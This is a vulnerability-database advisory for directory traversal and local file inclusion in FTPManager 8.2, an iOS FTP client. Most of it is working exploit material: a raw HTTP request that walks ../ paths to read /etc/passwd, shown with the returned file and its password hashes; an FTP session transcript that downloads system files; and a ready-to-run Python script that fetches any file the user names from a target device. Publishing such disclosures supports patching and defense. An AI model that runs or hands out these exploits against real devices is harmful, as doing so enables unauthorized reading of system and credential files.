FTPManager 8.2 Local File Inclusion / Directory Traversal

2022.09.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22
CWE-98

# Exploit Title: FTPManager 8.2 Local File inclusion # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: Ios 15.6 GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 192.168.1.178:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------------------ HTTP/1.1 200 OK Connection: Close Server: GCDWebUploader Content-Type: application/octet-stream Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT Date: Tue, 06 Sep 2022 03:05:05 GMT Content-Length: 2581 Cache-Control: max-age=3600, public Etag: 1152921500312311384/1657708546/0 ## # User Database # # This file is the authoritative user database. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false _neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false _ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false --------------------------------------------------- # Exploit Title: FTPManager 8.2 Directory Traversal (ftp) # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: ios 15.6 #ftp 192.168.1.178 2121 Connected to 192.168.1.178. 220 ---------- Welcome to FTPManager ---------- Name (192.168.1.178:chokri): 230 User chokri logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /../../../../../../../../../../../../../../../../ 250 OK. Current directory is /../../../../../../../../../../../../../../../../ ftp> ls 200 PORT command successful. 150 Accepted data connection total 10 drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin drwxr-xr-x 0 root wheel 160 Jan 01 1970 System drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library drwxr-xr-x 0 root wheel 224 Jan 01 1970 private drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer drwxr-xr-x 0 root admin 64 Jan 01 1970 cores WARNING! 10 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. ftp> cd private/etc 250 OK. Current directory is /../../../../../../../../../../../../../../../../private/etc ftp> get passwd local: passwd remote: passwd 200 PORT command successful. 150 Opening BINARY mode data connection for 'passwd'. 226 Transfer complete. 2581 bytes received in 0.00 secs (11.5020 MB/s) ftp> get services local: services remote: services 200 PORT command successful. 150 Opening BINARY mode data connection for 'services'. 226 Transfer complete. 677977 bytes received in 0.17 secs (3.8257 MB/s) --------------------------------------------------- # Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: ios 15.6 from ftplib import FTP import argparse help = " FTPManager 8.2 Local File inclusion by chokri hammedi" parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File To Open eg: etc/passwd") args = parser.parse_args() ip = args.target port = 2121 # Default Port files = args.file ftpConnection = FTP() ftpConnection.connect(host=ip, port=port) ftpConnection.login(); def downloadFile(): ftpConnection.cwd('/../../../../../../../../../../../../../../../../') ftpConnection.retrbinary(f"RETR {files}", open('data.txt', 'wb').write) ftpConnection.close() file = open('data.txt', 'r') print (f"[***] The contents of {files}\n") print (file.read()) downloadFile()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top